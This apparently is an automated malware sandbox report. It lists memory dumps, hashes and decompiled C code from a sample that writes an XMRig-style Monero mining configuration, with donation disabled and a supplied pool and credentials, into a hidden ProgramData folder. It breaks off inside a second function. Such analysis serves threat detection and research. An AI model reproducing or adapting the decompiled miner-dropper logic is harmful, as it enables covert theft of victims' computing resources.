                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 79fd513e53ec72c2489541d7365bae8f29f68f1c33b1dad63e390a1b3710fded
                                                                                                                                          • Instruction ID: 7e75f1d4771fc12acd67c6b6b3a2a17d3c6616beeacb24eeab20b3b9f01c2f99
                                                                                                                                          • Opcode Fuzzy Hash: 79fd513e53ec72c2489541d7365bae8f29f68f1c33b1dad63e390a1b3710fded
                                                                                                                                          • Instruction Fuzzy Hash: 12E092B0A682058FE714FF28E5C1AA977A6E746308F00C40A91069F788CB745D428FA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b01ba597c0be3f331b46d95d76899fb78946f3dee209a06507ba67f51fe58080
                                                                                                                                          • Instruction ID: 01ba628a38f4917cbb20350463e516ddd185dd5db198d2e7eefe6f06136d46be
                                                                                                                                          • Opcode Fuzzy Hash: b01ba597c0be3f331b46d95d76899fb78946f3dee209a06507ba67f51fe58080
                                                                                                                                          • Instruction Fuzzy Hash: E2D0A76520D7A917F3235268AC195D67FA88B87520F0801D3D14CCB993C5585CC183E5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ec8ac8830d10e875015284237392ca3b380bca839940db25b0df4f66933b2346
                                                                                                                                          • Instruction ID: 979f86209f3b6c4e2b3b5c99bc95b1a5ba6fea36d2eafdb2e2ceacd71428f2ee
                                                                                                                                          • Opcode Fuzzy Hash: ec8ac8830d10e875015284237392ca3b380bca839940db25b0df4f66933b2346
                                                                                                                                          • Instruction Fuzzy Hash: 2ED0A7B37081445FD304C698DC52B55BF99CB94110F44C06DE999CB352EE26FD13C194
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ee649b73eef718744f4232a6ac31760f01ec6779220bdcd3b667e1ddb59ef060
                                                                                                                                          • Instruction ID: 922e2ea901eaea833b5d3d5ff9c25b2b19a6b6a5493f8aa66bc9fffd3edda688
                                                                                                                                          • Opcode Fuzzy Hash: ee649b73eef718744f4232a6ac31760f01ec6779220bdcd3b667e1ddb59ef060
                                                                                                                                          • Instruction Fuzzy Hash: 7FD0A7BB6082445FD301C558D8A2A71FBD99F84120F04C06AA848C7752DA26FC5286A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5a743feda17f81db193c53f2a99f27118f61b320c699694346875e8b90ec13cb
                                                                                                                                          • Instruction ID: a2c5c80507667178c1c04bbed3c1dacf4f445034755d565e01d5620f8336887e
                                                                                                                                          • Opcode Fuzzy Hash: 5a743feda17f81db193c53f2a99f27118f61b320c699694346875e8b90ec13cb
                                                                                                                                          • Instruction Fuzzy Hash: 04D0C9F9B540148FDAA4D69CE0608EA77AAFB85126B0401A6F30ECBE20DB219D158B81
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                          • Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
                                                                                                                                          • Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                          • Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • Opcode Fuzzy Hash: 37634e3bf495d8ac3220c3b07c1f8c5bdfc768e64c0ccb9649850de655a7ee9b
                                                                                                                                          • Instruction Fuzzy Hash: F0C09270601248CFCB0ACF34C1588407B72FF4230639A40D8D0098BA22CB36DCC2CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: %
                                                                                                                                          • API String ID: 0-2567322570
                                                                                                                                          • Opcode ID: 7c38afded0834e747cedaf5c183c7105da27ff8655772e1cb10473e30d7d4948
                                                                                                                                          • Instruction ID: 5361813c108881f8bcd5b9487d7e1aafaa3f25796e5b654a1183a3a9368f4033
                                                                                                                                          • Opcode Fuzzy Hash: 7c38afded0834e747cedaf5c183c7105da27ff8655772e1cb10473e30d7d4948
                                                                                                                                          • Instruction Fuzzy Hash: 75029DB0A00209DFDF14EFB9C844AAEBBB2FF89304F18892DD5059B355DB35A906CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1bbccdc7578aa988dffa904fb3f86a32ef567ab192f70611f220111164c7aeda
                                                                                                                                          • Instruction ID: bcbfccad063ee541f0a9d5578a6ea24f9d7b18b4e4776af0825cc69ed321bc49
                                                                                                                                          • Opcode Fuzzy Hash: 1bbccdc7578aa988dffa904fb3f86a32ef567ab192f70611f220111164c7aeda
                                                                                                                                          • Instruction Fuzzy Hash: 17A203B0A10219DFCF25DF68C894AA9BBB2FF49304F1585A9E849AB351CB75DD81CF40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 55bdd20f3f8d3c702c0480ca6e5d4b1da099897c51b76dbe42f2854255db54db
                                                                                                                                          • Instruction ID: d853ab7d46cbf08466ebc558ef0c0e109035d7a5e3eff0062f0e4eb1dbf8b5da
                                                                                                                                          • Opcode Fuzzy Hash: 55bdd20f3f8d3c702c0480ca6e5d4b1da099897c51b76dbe42f2854255db54db
                                                                                                                                          • Instruction Fuzzy Hash: 218228B4A10215CFDB64DF28C894A69B7F2FF89310F1985A9D44A9B361DB30ED81CF52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fb0bf94396c18ddc715bf305518d5a80dab0d06024ee19f6eac6504f27a9f288
                                                                                                                                          • Instruction ID: 1b1bbcc70045a52f645550b98e29d83381f4057e65d2457fcc6c6bf156b28603
                                                                                                                                          • Opcode Fuzzy Hash: fb0bf94396c18ddc715bf305518d5a80dab0d06024ee19f6eac6504f27a9f288
                                                                                                                                          • Instruction Fuzzy Hash: 212215B0A10219DFCB58CF68D994B99BBB2BF49305F1880A9E809EB351CB35DD85CF51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b10ef241a5e1414310c36b2bd5197ed8032d034dd639e3593cbbad8ab6f1f9ef
                                                                                                                                          • Instruction ID: a7705b36db51b144fbd2470434b77d2b692ec40fbdd764345bdc94cc3e423883
                                                                                                                                          • Opcode Fuzzy Hash: b10ef241a5e1414310c36b2bd5197ed8032d034dd639e3593cbbad8ab6f1f9ef
                                                                                                                                          • Instruction Fuzzy Hash: B612AFF1811B468BE734CF65E8985893BA1F785328B91420CD2616EBF9D7B8117ECF84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 847fdeefbe44fea8a3d099182198f7bcb2bd76bcab824f37e7371caf91351877
                                                                                                                                          • Instruction ID: 1b47636b44bb106c282a3639b692eb89a29f587911b306321476112a976325ca
                                                                                                                                          • Opcode Fuzzy Hash: 847fdeefbe44fea8a3d099182198f7bcb2bd76bcab824f37e7371caf91351877
                                                                                                                                          • Instruction Fuzzy Hash: DAA16C32E0021ACFCF05DFB5C8949DEBBB2FF95304B15856AE905AB261EB31A915CF40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 90f819417a483e1f671007ab312efd08e89903f22d1b3f6f71171f4967154847
                                                                                                                                          • Instruction ID: 86ac09720b49fa3055b23b1b90bfe5b50d98989f33213177fab950f6def14072
                                                                                                                                          • Opcode Fuzzy Hash: 90f819417a483e1f671007ab312efd08e89903f22d1b3f6f71171f4967154847
                                                                                                                                          • Instruction Fuzzy Hash: C2C115B1811B468BD724DF65E8985897BB1FB85328F51420CD2616FBF8D7B810BACF84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Executed Functions

                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E00403CA0(char* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                          				char _v12;
                                                                                                                                          				intOrPtr _v16;
                                                                                                                                          				char _v20;
                                                                                                                                          				char _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				void* _v32;
                                                                                                                                          				long _v36;
                                                                                                                                          				long _v40;
                                                                                                                                          				intOrPtr _v44;
                                                                                                                                          				char* _v48;
                                                                                                                                          				long _v52;
                                                                                                                                          				void* _v56;
                                                                                                                                          				long _v60;
                                                                                                                                          				void* _v64;
                                                                                                                                          				long _v68;
                                                                                                                                          				long _v72;
                                                                                                                                          				struct _SYSTEM_INFO _v108;
                                                                                                                                          				char _v2156;
                                                                                                                                          				char _v2676;
                                                                                                                                          				void* _t129;
                                                                                                                                          				char* _t132;
                                                                                                                                          				signed int _t137;
                                                                                                                                          				void* _t139;
                                                                                                                                          				long _t150;
                                                                                                                                          				char* _t282;
                                                                                                                                          				char* _t284;
                                                                                                                                          				void* _t321;
                                                                                                                                          				void* _t323;
                                                                                                                                          				void* _t334;
                                                                                                                                          				void* _t336;
                                                                                                                                          
                                                                                                                                          				_t334 = __edx;
                                                                                                                                          				_t331 = __ecx;
                                                                                                                                          				_t129 =  *0x5d2df0; // 0x3b8
                                                                                                                                          				_t336 = _a4;
                                                                                                                                          				if(_t336 == 0) {
                                                                                                                                          					_t129 =  *0x5d2124; // 0x408
                                                                                                                                          				}
                                                                                                                                          				if(_t129 != 0 && _t129 != 0xffffffff) {
                                                                                                                                          					NtClose(_t129);
                                                                                                                                          				}
                                                                                                                                          				E00401A00( &_v2676, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          				_t132 =  &_v2676;
                                                                                                                                          				if(_t336 == 0) {
                                                                                                                                          					_push(L"\\cfg");
                                                                                                                                          				} else {
                                                                                                                                          					_push(L"\\cfgi");
                                                                                                                                          				}
                                                                                                                                          				_push(_t132);
                                                                                                                                          				E00401970();
                                                                                                                                          				E00401BB0( &_v2156, 0, 0x800);
                                                                                                                                          				_a4 = 0;
                                                                                                                                          				_v56 = 0;
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				_v36 = 0;
                                                                                                                                          				asm("movups [ebp-0x30], xmm0");
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v64 = 0;
                                                                                                                                          				_v60 = 0;
                                                                                                                                          				_v72 = 0;
                                                                                                                                          				_v68 = 0;
                                                                                                                                          				GetSystemInfo( &_v108); // executed
                                                                                                                                          				if(_t336 != 0) {
                                                                                                                                          					_t137 = _v108.dwNumberOfProcessors;
                                                                                                                                          					if( *0x5d130c != 1) {
                                                                                                                                          						goto L11;
                                                                                                                                          					} else {
                                                                                                                                          						if(_t137 >= 1) {
							goto L17;
						} else {
							_t139 = 1;
						}
					}
					goto L18;
				} else {
					if( *0x5d1308 != 2) {
						E004017E0( &_v12, "1");
					} else {
						_t137 = _v108.dwNumberOfProcessors;
						L11:
						asm("cdq");
						_t137 = _t137 - _t334 >> 1;
						if(_t137 >= 1) {
							L17:
							_t139 =  >  ? 0xff : _t137;
						} else {
							_t139 = 1;
						}
						L18:
						_t331 =  &_v12;
						E00401550(_t139,  &_v12);
					}
				}
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				_push(0);
				_push(0);
				_push( &_v20);
				_push( &_v2676);
				if( *0x5d10b8() != 1) {
					L29:
					return 0; // executed
				} else {
					_v56 = 0x18;
					_v48 =  &_v20;
					_v52 = 0;
					_v44 = 0x40;
					_v40 = 0;
					_v36 = 0;
					_t150 = NtCreateFile( &_a4, 0x120116,  &_v56,  &_v32,  &_v64, 0x80, 0, 0, 0x60, 0, 0); // executed
					if(_t150 != 0) {
						goto L29;
					} else {
						E004017E0( &_v2156, "{\r\n\t\"api\": {");
						E004016E0( &_v2156, "\r\n\t\t\"id\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"worker-id\": null");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"http\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": false");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"autosave\": false,");
						E004016E0( &_v2156, "\r\n\t\"version\": 1,");
						E004016E0( &_v2156, "\r\n\t\"background\": false,");
						E004016E0( &_v2156, "\r\n\t\"colors\": true,");
						E004016E0( &_v2156, "\r\n\t\"randomx\": {");
						E004016E0( &_v2156, "\r\n\t\t\"init\": 1,");
						E004016E0( &_v2156, "\r\n\t\t\"numa\": true");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"cpu\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"huge-pages\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"hw-aes\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"priority\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"memory-pool\": false,");
						E004016E0( &_v2156, "\r\n\t\t\"asm\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"argon2-impl\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"cpu-profile\": {");
						E004016E0( &_v2156, "\r\n\t\t\t\"threads\": ");
						E004016E0( &_v2156,  &_v12);
						E004016E0( &_v2156, "\r\n\t\t},");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/xhv\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/tube\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/1\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/r\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/fast\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-gpu\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/half\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/2\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/chukwa\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/wrkz\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/loki\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/wow\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/arq\": \"cpu-profile\"");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"donate-level\": ");
						E004016E0( &_v2156, "0");
						E004016E0( &_v2156, ",");
						E004016E0( &_v2156, "\r\n\t\"donate-over-proxy\": 0,");
						E004016E0( &_v2156, "\r\n\t\"log-file\": null,");
						E004016E0( &_v2156, "\r\n\t\"pools\": [");
						E004016E0( &_v2156, "\r\n\t\t{");
						E004016E0( &_v2156, "\r\n\t\t\t\"algo\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"coin\": \"monero\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"url\": \"");
						E004016E0( &_v2156, _a8);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"user\": \"");
						E004016E0( &_v2156, _a12);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"pass\": \"");
						E004016E0( &_v2156, _a16);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"rig-id\": null,");
						_t282 =  &_v2156;
						if(_a20 == 0) {
							_push("\r\n\t\t\t\"nicehash\": false,");
						} else {
							_push("\r\n\t\t\t\"nicehash\": true,");
						}
						_push(_t282);
						E004016E0();
						_t284 =  &_v2156;
						if( *0x5d1c24 == 0) {
							_push("\r\n\t\t\t\"keepalive\": false,");
						} else {
							_push("\r\n\t\t\t\"keepalive\": true,");
						}
						E004016E0();
						E004016E0( &_v2156, "\r\n\t\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls-fingerprint\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"daemon\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"self-select\": null");
						E004016E0( &_v2156, "\r\n\t\t}");
						E004016E0( &_v2156, "\r\n\t],");
						E004016E0( &_v2156, "\r\n\t\"print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"health-print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"retries\": 5,");
						E004016E0( &_v2156, "\r\n\t\"retry-pause\": 5,");
						E004016E0( &_v2156, "\r\n\t\"syslog\": false,");
						E004016E0( &_v2156, "\r\n\t\"user-agent\": null,");
						E004016E0( &_v2156, "\r\n\t\"watch\": false");
						E004016E0( &_v2156, "\r\n}");
						_t321 = E004088D0(_t331,  &_v2156, E00401850( &_v2156) + 1,  &_v24);
						_t323 =  *0x5d10c0(_a4, 0, 0, 0,  &_v32, _t321, _v24,  &_v72, 0, _t284); // executed
						_push(_a4);
						if(_t323 == 0) {
							NtClose(); // executed
							_push(_v16);
							E00403720(_t334, _t336, _v20); // executed
							return 1;
						} else {
							NtClose();
							goto L29;
						}
					}
				}
			}
                                                                                                                                          0x00403ca0
                                                                                                                                          0x00403ca0
                                                                                                                                          0x00403ca3
                                                                                                                                          0x00403caf
                                                                                                                                          0x00403cb4
                                                                                                                                          0x00403cb6
                                                                                                                                          0x00403cb6
                                                                                                                                          0x00403cbd
                                                                                                                                          0x00403cc5
                                                                                                                                          0x00403cc5
                                                                                                                                          0x00403cd7
                                                                                                                                          0x00403cdf
                                                                                                                                          0x00403ce7
                                                                                                                                          0x00403cf0
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403ce9
                                                                                                                                          0x00403cf5
                                                                                                                                          0x00403cf6
                                                                                                                                          0x00403d0c
                                                                                                                                          0x00403d14
                                                                                                                                          0x00403d1e
                                                                                                                                          0x00403d25
                                                                                                                                          0x00403d28
                                                                                                                                          0x00403d2f
                                                                                                                                          0x00403d34
                                                                                                                                          0x00403d3b
                                                                                                                                          0x00403d42
                                                                                                                                          0x00403d49
                                                                                                                                          0x00403d50
Control-flow graph node addresses (address column of the disassembly listing; the instruction columns are not present in this extract):
0x00403d57, 0x00403d5e, 0x00403d66, 0x00403d9c, 0x00403d9f, 0x00000000, 0x00403da1, 0x00403da4,
0x00000000, 0x00403da6, 0x00403da6, 0x00403da6, 0x00403da4, 0x00000000, 0x00403d68, 0x00403d6f,
0x00403d8e, 0x00403d71, 0x00403d71, 0x00403d74, 0x00403d74, 0x00403d77, 0x00403d7c, 0x00403dad,
0x00403db7, 0x00403d7e, 0x00403d7e, 0x00403d7e, 0x00403dba, 0x00403dba, 0x00403dbf, 0x00403dbf,
0x00403d6f, 0x00403dca, 0x00403dcd, 0x00403dd2, 0x00403dd4, 0x00403dd6, 0x00403ddd, 0x00403de6,
0x00404444, 0x0040444a, 0x00403dec, 0x00403dfe, 0x00403e05, 0x00403e0f, 0x00403e1a, 0x00403e2a,
0x00403e32, 0x00403e39, 0x00403e41, 0x00000000, 0x00403e47, 0x00403e53, 0x00403e64, 0x00403e75,
0x00403e86, 0x00403e97, 0x00403ea8, 0x00403eb9, 0x00403eca, 0x00403ede, 0x00403eef, 0x00403f00,
0x00403f11, 0x00403f22, 0x00403f33, 0x00403f44, 0x00403f55, 0x00403f69, 0x00403f7a, 0x00403f8b,
0x00403f9c, 0x00403fad, 0x00403fbe, 0x00403fcf, 0x00403fe0, 0x00403ff4, 0x00404004, 0x00404015,
0x00404026, 0x00404037, 0x00404048, 0x00404059, 0x0040406a, 0x0040407e, 0x0040408f, 0x004040a0,
0x004040b1, 0x004040c2, 0x004040d3, 0x004040e4, 0x004040f5, 0x00404109, 0x0040411a, 0x0040412b,
0x0040413c, 0x0040414d, 0x0040415e, 0x0040416f, 0x00404180, 0x00404194, 0x004041a5, 0x004041b6,
0x004041c7, 0x004041d8, 0x004041e9, 0x004041fa, 0x0040420b, 0x0040421d, 0x0040422e, 0x0040423f,
0x0040424e, 0x0040425f, 0x00404270, 0x0040427f, 0x00404290, 0x004042a4, 0x004042ac, 0x004042b6,
0x004042bf, 0x004042b8, 0x004042b8, 0x004042b8, 0x004042c4, 0x004042c5, 0x004042cd, 0x004042da,
0x004042e3, 0x004042dc, 0x004042dc, 0x004042dc, 0x004042e9, 0x004042fd, 0x0040430e, 0x0040431f,
0x00404330, 0x00404341, 0x00404352, 0x00404363, 0x00404374, 0x00404388, 0x00404399, 0x004043aa,
0x004043bb, 0x004043cc, 0x004043dd, 0x004043ee, 0x00404412, 0x00404431, 0x00404437, 0x0040443c,
0x0040444b, 0x00404451, 0x00404458, 0x00404469, 0x0040443e, 0x0040443e, 0x00000000, 0x0040443e,
0x0040443c, 0x00403e41

APIs
• NtClose.NTDLL(000003B8), ref: 00403CC5
• GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 00403D5E
• RtlDosPathNameToNtPathName_U.NTDLL(?,00000001,00000000,00000000), ref: 00403DDE
• NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403E39
• NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00404821,00000000,00000000), ref: 00404431
• NtClose.NTDLL(00000000), ref: 0040443E
• NtClose.NTDLL(00000000), ref: 0040444B
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Close$FilePath$CreateInfoNameName_SystemWrite
• String ID: "algo": null,$"coin": "monero",$"daemon": false,$"enabled": true,$"keepalive": false,$"keepalive": true,$"nicehash": false,$"nicehash": true,$"pass": "$"rig-id": null,$"self-select": null$"threads": $"tls": false,$"tls-fingerprint": null,$"url": "$"user": "$"argon2-impl": null,$"argon2/chukwa": "cpu-profile",$"argon2/wrkz": "cpu-profile",$"asm": true,$"cn": "cpu-profile",$"cn-gpu": "cpu-profile",$"cn-heavy/0": "cpu-profile",$"cn-heavy/tube": "cpu-profile",$"cn-heavy/xhv": "cpu-profile",$"cn-lite/0": "cpu-profile",$"cn-lite/1": "cpu-profile",$"cn/2": "cpu-profile",$"cn/fast": "cpu-profile",$"cn/half": "cpu-profile",$"cn/r": "cpu-profile",$"cpu-profile": {$"enabled": false$"enabled": true,$"huge-pages": true,$"hw-aes": null,$"id": null,$"init": 1,$"memory-pool": false,$"numa": true$"priority": null,$"rx": "cpu-profile",$"rx/0": "cpu-profile",$"rx/arq": "cpu-profile"$"rx/loki": "cpu-profile",$"rx/wow": "cpu-profile",$"worker-id": null${$}$},$"autosave": false,$"background": false,$"colors": true,$"cpu": {$"donate-level": $"donate-over-proxy": 0,$"health-print-time": 60,$"http": {$"log-file": null,$"pools": [$"print-time": 60,$"randomx": {$"retries": 5,$"retry-pause": 5,$"syslog": false,$"user-agent": null,$"version": 1,$"watch": false$],$},$},$},$},$}$@$C:\ProgramData\LKBNMTFJgl$\cfg$\cfgi${"api": {
• API String ID: 3784785972-1821464420
• Opcode ID: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
• Instruction ID: 0c6b8c97c8f286fc2f2609601cf0158cca0e688ef71c127dda3ca6300913d252
• Opcode Fuzzy Hash: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
• Instruction Fuzzy Hash: DE020771E5021CA6CB50EEE18C86FCE73ECAB04744F554677B148B21D2DEBEDA848B58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
E00404B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
	void* _v8;
	void _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	long _v32;
	char* _v36;
	char* _v40;
	char* _v44;
	char* _v48;
	char* _v52;
	intOrPtr _v56;
	intOrPtr _v64;
	char* _v68;
	short _v88;
	intOrPtr _v92;
	intOrPtr _v96;
	intOrPtr _v104;
	char _v108;
	void* _v112;
	long _t54;
	int _t55;
	void* _t61;
	void* _t62;
	void* _t66;
	void* _t71;
	int _t78;
	long _t87;
	char* _t91;
	long _t108;
	void* _t111;
	char* _t118;
	long _t119;
	char* _t123;
	void* _t126;
	void* _t128;
	void* _t134;
	void* _t136;
	void* _t137;
                                                                                                                                          				void* _t138;
                                                                                                                                          				void* _t139;
                                                                                                                                          				void* _t140;
                                                                                                                                          
                                                                                                                                          				E00401BB0( &_v108, 0, 0x38);
                                                                                                                                          				_t118 = _a4;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_t108 = 0;
                                                                                                                                          				_v112 = 0x3c;
                                                                                                                                          				_v92 = 0xffffffff;
                                                                                                                                          				_v104 = 0xffffffff;
                                                                                                                                          				_v64 = 0xffffffff;
                                                                                                                                          				_v56 = 0xffffffff;
                                                                                                                                          				_t54 = E00401850(_t118);
